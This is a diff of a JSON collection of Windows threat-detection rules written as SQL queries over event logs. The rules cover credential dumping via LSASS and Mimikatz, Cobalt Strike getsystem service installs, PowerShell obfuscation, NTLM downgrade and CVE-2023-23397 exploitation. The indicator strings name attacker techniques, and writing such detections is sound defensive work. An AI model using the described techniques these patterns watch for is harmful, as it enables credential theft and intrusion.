"filename": "win_security_invoke_obfuscation_clip_services_security.yml" }, { - "title": "ISO or Image Mount Indicator in Recent Files", - "id": "4358e5a5-7542-4dcb-b9f3-87667371839b", + "title": "DCERPC SMB Spoolss Named Pipe", + "id": "214e8f95-100a-4e04-bb31-ef6cba8ce07e", "status": "test", - "description": "Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.\nThis can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.\n", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", + "author": "OTR (Open Threat Research)", + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ], "falsepositives": [ - "Cases in which a user mounts an image file for legitimate reasons" + "Domain Controllers acting as printer servers too? 
:)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%.iso.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.img.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.vhd.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.vhdx.lnk' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Recent\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss')" ], - "filename": "file_event_win_iso_file_recent.yml" + "filename": "win_security_dce_rpc_smb_spoolss_named_pipe.yml" }, { - "title": "Potential Binary Or Script Dropper Via PowerShell.EXE", - "id": "7047d730-036f-4f40-b9d8-1c63e36d5e62", + "title": "CVE-2023-23397 Exploitation Attempt", + "id": "73c59189-6a6d-4b9f-a748-8f6f9bbed75c", "status": "experimental", - "description": "Detects PowerShell creating a binary executable or script file.", - "author": "frack113", + "description": "Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.", + "author": "Robert Lee @quantum_cookie", "tags": [ - "attack.persistence" + "attack.credential_access", + "attack.initial_access", + "cve.2023.23397" ], "falsepositives": [ - "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." + "Searchprotocolhost.exe likes to query these registry keys. 
To avoid false postives, it's better to filter out those events before they reach the SIEM" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\_\\_PSScriptPolicyTest\\_%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%Services\\\\%' ESCAPE '\\' AND (ObjectName LIKE '%WebClient\\\\NetworkProvider' ESCAPE '\\' OR ObjectName LIKE '%LanmanWorkstation\\\\NetworkProvider' ESCAPE '\\') AND AccessList LIKE '%\\%\\%4416%' ESCAPE '\\')" ], - "filename": "file_event_win_powershell_drop_binary.yml" + "filename": "win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml" }, { - "title": "Suspicious Process Writes Ntds.dit", - "id": "11b1ed55-154d-4e82-8ad7-83739298f720", - "status": "experimental", - "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file", - "author": "Florian Roth (Nextron Systems)", + "title": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln", + "id": "8400629e-79a9-4737-b387-5db940ab2367", + "status": "test", + "description": "Detects the use of a scanner by 
zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", + "author": "Florian Roth (Nextron Systems), Adam Bradbury (idea)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003" + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND TargetUserName = 'AAAAAAA')" ], - "filename": "file_event_win_susp_ntds_dit.yml" + "filename": "win_security_rdp_bluekeep_poc_scanner.yml" }, { - "title": "Wmiprvse Wbemcomn DLL Hijack - File", - "id": "614a7e17-5643-4d89-b6fe-f9df1a79641c", + "title": "Unauthorized System Time Modification", + "id": "faa031b5-21ed-4e02-8881-2591f98d82ed", "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detect scenarios where a potentially unauthorized application or user is modifying the system time.", + "author": "@neu5ron", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1070.006" ], "falsepositives": [ - "Unknown" + "HyperV or other virtualization technologies with binary not listed in filter portion of detection" ], - "level": "critical", + "level": 
"low", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName = 'System' AND TargetFilename LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4616' AND NOT (((ProcessName LIKE 'C:\\\\Program Files\\\\VMware\\\\VMware Tools\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\VBoxService.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\oobe\\\\msoobe.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND SubjectUserSid = 'S-1-5-19')))" ], - "filename": "file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "win_security_susp_time_modification.yml" }, { - "title": "UAC Bypass Using IEInstal - File", - "id": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", - "status": "test", - "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - Security", + "id": "7a922f1b-2635-4d6c-91ef-af228b198ad3", + "status": "experimental", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\IEInstal.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%consent.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%new-object%' ESCAPE '\\' AND ServiceFileName LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND ServiceFileName LIKE '%readtoend%' 
ESCAPE '\\' AND (ServiceFileName LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR ServiceFileName LIKE '%system.io.streamreader%' ESCAPE '\\'))" ], - "filename": "file_event_win_uac_bypass_ieinstal.yml" + "filename": "win_security_invoke_obfuscation_via_compress_services_security.yml" }, { - "title": "Potential Persistence Via Microsoft Office Add-In", - "id": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", + "title": "Security Eventlog Cleared", + "id": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", "status": "test", - "description": "Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).", - "author": "NVISO", + "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1137.006" + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" ], "falsepositives": [ - "Legitimate add-ins" + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.wll' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xll' ESCAPE '\\') OR (TargetFilename LIKE '%Microsoft\\\\Excel\\\\XLSTART\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xlam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Addins\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.xlam' ESCAPE '\\' OR TargetFilename LIKE '%.xla' ESCAPE '\\' OR TargetFilename LIKE '%.ppam' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '517' AND Provider_Name = 'Security') OR (EventID = '1102' AND Provider_Name = 
'Microsoft-Windows-Eventlog')))" ], - "filename": "file_event_win_office_addin_persistence.yml" + "filename": "win_security_susp_eventlog_cleared.yml" }, { - "title": "Legitimate Application Dropped Archive", - "id": "654fcc6d-840d-4844-9b07-2c3300e54a26", - "status": "experimental", - "description": "Detects programs on a Windows system that should not write an archive to disk", - "author": "frack113, Florian Roth", + "title": "Remote Task Creation via ATSVC Named Pipe", + "id": "f6de6525-4509-495a-8a82-1f8b0ed73a00", + "status": "test", + "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.lateral_movement", + "attack.persistence", + "car.2013-05-004", + "car.2015-04-001", + "attack.t1053.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.7z' ESCAPE '\\' OR TargetFilename LIKE '%.diagcab' ESCAPE '\\' OR TargetFilename LIKE '%.appx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'atsvc' AND Accesses LIKE '%WriteData%' ESCAPE '\\')" ], - "filename": "file_event_win_legitimate_app_dropping_archive.yml" + "filename": "win_security_atsvc_task.yml" }, { - "title": "UEFI Persistence Via Wpbbin - FileCreation", - "id": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", - "status": "experimental", - "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. Which could be indicative of UEFI based persistence method", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "RDP Login from Localhost", + "id": "51e33403-2a37-4d66-a574-1fda1782cc31", + "status": "test", + "description": "RDP login with localhost source address may be a tunnelled login", + "author": "Thomas Patzke", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1542.001" + "attack.lateral_movement", + "car.2013-07-002", + "attack.t1021.001" ], "falsepositives": [ - "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND IpAddress IN ('::1', '127.0.0.1'))" ], - "filename": "file_event_win_wpbbin_persistence.yml" + "filename": "win_security_rdp_localhost_login.yml" }, { - "title": "LSASS Process Dump Artefact In CrashDumps Folder", - "id": "6902955a-01b7-432c-b32a-6f5f81d8f625", - "status": "experimental", - 
"description": "Detects the presence of an LSASS dump file in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.", - "author": "@pbssubhash", + "title": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'", + "id": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", + "status": "test", + "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.", + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" ], "falsepositives": [ - "Rare legitimate dump of the process by the operating system due to a crash of lsass" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%lsass.exe.%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4673' AND Service = 'LsaRegisterLogonProcess()' AND Keywords = '0x8010000000000000')" ], - "filename": "file_event_win_lsass_shtinkering.yml" + "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" }, { - "title": "WMI Persistence - Script Event Consumer File Write", - "id": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", + "title": "NetNTLM Downgrade Attack", + "id": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", "status": "test", - "description": "Detects file writes of WMI script event consumer", - "author": "Thomas Patzke", + "description": "Detects NetNTLM downgrade attack", + "author": "Florian Roth (Nextron 
Systems), wagga", "tags": [ - "attack.t1546.003", - "attack.persistence" + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ - "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4657' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%ControlSet%' ESCAPE '\\' AND ObjectName LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND ObjectValueName IN ('LmCompatibilityLevel', 'NtlmMinClientSec', 'RestrictSendingNTLMTraffic'))" ], - "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml" + "filename": "win_security_net_ntlm_downgrade.yml" }, { - "title": "DLL Search Order Hijackig Via Additional Space in Path", - "id": "b6f91281-20aa-446a-b986-38a92813a18f", - "status": "experimental", - "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", - "author": "frack113, Nasreddine Bencherchali", + "title": "AD Object WriteDAC Access", + "id": "028c7842-4243-41cd-be6f-12f3cf1a26c7", + "status": "test", + "description": "Detects WRITE_DAC access to a domain object", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.persistence", - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1574.002" + "attack.t1222.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86) \\\\%' ESCAPE '\\') AND 
TargetFilename LIKE '%.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectServer = 'DS' AND AccessMask = '0x40000' AND ObjectType IN ('19195a5b-6da0-11d0-afd3-00c04fd930c9', 'domainDNS'))" ], - "filename": "file_event_win_dll_sideloading_space_path.yml" + "filename": "win_security_ad_object_writedac_access.yml" }, - { - "title": "Mimikatz Kirbi File Creation", - "id": "9e099d99-44c2-42b6-a6d8-54c3545cab29", + { + "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security", + "id": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", "status": "test", - "description": "Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.", - "author": "Florian Roth (Nextron Systems), David ANDRE", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.credential_access", - "attack.t1558" + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Unlikely" + "Highly unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%.kirbi' ESCAPE '\\' OR TargetFilename LIKE '%mimilsa.log' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%cmd.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE 
'%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%.dll,a%' ESCAPE '\\' AND ServiceFileName LIKE '%/p:%' ESCAPE '\\')))" ], - "filename": "file_event_win_hktl_mimikatz_files.yml" + "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" }, { - "title": "Anydesk Temporary Artefact", - "id": "0b9ad457-2554-44c1-82c2-d56a99c42377", - "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "title": "Invoke-Obfuscation VAR+ Launcher - Security", + "id": "dcf2db1f-f091-425b-a821-c05875b8925a", + "status": "experimental", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\AnyDesk\\\\user.conf%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\AnyDesk\\\\system.conf%' ESCAPE '\\') AND TargetFilename LIKE '%.temp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%\"set%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE 
'%/c%' ESCAPE '\\' OR ServiceFileName LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "file_event_win_anydesk_artefact.yml" + "filename": "win_security_invoke_obfuscation_var_services_security.yml" }, { - "title": "Dumpert Process Dumper Default File", - "id": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", + "title": "Failed Logon From Public IP", + "id": "f88e112a-21aa-44bd-9b01-6ee2a2bbbed1", "status": "test", - "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", - "author": "Florian Roth (Nextron Systems)", + "description": "A login from a public IP can indicate a misconfigured firewall or network boundary.", + "author": "NVISO", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.initial_access", + "attack.persistence", + "attack.t1078", + "attack.t1190", + "attack.t1133" ], "falsepositives": [ - "Very unlikely" + "Legitimate logon attempts over the internet", + "IPv4-to-IPv6 mapped IPs" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\dumpert.dmp' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND NOT ((IpAddress LIKE '%-%' ESCAPE '\\') OR ((IpAddress LIKE '10.%' ESCAPE '\\' OR IpAddress LIKE '192.168.%' ESCAPE '\\' OR IpAddress LIKE '172.16.%' ESCAPE '\\' OR IpAddress LIKE '172.17.%' ESCAPE '\\' OR IpAddress LIKE '172.18.%' ESCAPE '\\' OR IpAddress LIKE '172.19.%' ESCAPE '\\' OR IpAddress LIKE '172.20.%' ESCAPE '\\' OR IpAddress LIKE '172.21.%' ESCAPE '\\' OR IpAddress LIKE '172.22.%' ESCAPE '\\' OR IpAddress LIKE '172.23.%' ESCAPE '\\' OR IpAddress LIKE '172.24.%' ESCAPE '\\' OR IpAddress LIKE '172.25.%' ESCAPE '\\' OR IpAddress LIKE '172.26.%' ESCAPE '\\' OR IpAddress LIKE '172.27.%' ESCAPE '\\' OR IpAddress LIKE '172.28.%' ESCAPE '\\' OR IpAddress LIKE '172.29.%' ESCAPE '\\' OR IpAddress LIKE '172.30.%' ESCAPE '\\' OR IpAddress LIKE '172.31.%' ESCAPE '\\' OR IpAddress LIKE '127.%' 
ESCAPE '\\' OR IpAddress LIKE '169.254.%' ESCAPE '\\')) OR (IpAddress = '::1' OR (IpAddress LIKE 'fe80::%' ESCAPE '\\' OR IpAddress LIKE 'fc00::%' ESCAPE '\\'))))" ], - "filename": "file_event_win_hktl_dumpert.yml" + "filename": "win_security_susp_failed_logon_source.yml" }, { - "title": "Installation of TeamViewer Desktop", - "id": "9711de76-5d4f-4c50-a94f-21e4e8f8384d", - "status": "test", - "description": "TeamViewer_Desktop.exe is create during install", + "title": "Device Installation Blocked", + "id": "c9eb55c3-b468-40ab-9089-db2862e42137", + "status": "experimental", + "description": "Detects an installation of a device that is forbidden by the system policy", "author": "frack113", - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\TeamViewer\\_Desktop.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '6423')" ], - "filename": "file_event_win_install_teamviewer_desktop.yml" + "filename": "win_security_device_installation_blocked.yml" }, { - "title": "Suspicious Startup Folder Persistence", - "id": "28208707-fe31-437f-9a7f-4b1108b94d2e", + "title": "Important Scheduled Task Deleted/Disabled", + "id": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", "status": "experimental", - "description": "Detects when a file with a suspicious extension is created in the startup folder", + "description": "Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.privilege_escalation", "attack.persistence", - "attack.t1547.001" + "attack.t1053.005" ], "falsepositives": [ - "Rare legitimate usage of some of the extensions mentioned in the rule" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename 
LIKE '%\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.jar' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4699', '4701') AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\Schedule%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((EventID = '4699' AND SubjectUserName LIKE '%$' ESCAPE '\\' AND TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\')))" ], - "filename": "file_event_win_susp_startup_folder_persistence.yml" + "filename": "win_security_susp_scheduled_task_delete_or_disable.yml" }, { - "title": "CVE-2021-44077 POC Default Dropped File", - "id": "7b501acf-fa98-4272-aa39-194f82edc8a3", - "status": "experimental", - "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "ADCS Certificate Template Configuration Vulnerability", + "id": "5ee3a654-372f-11ec-8d3d-0242ac130003", + "status": "test", + "description": "Detects certificate creation with template allowing risk permission subject", + "author": "Orlinum , 
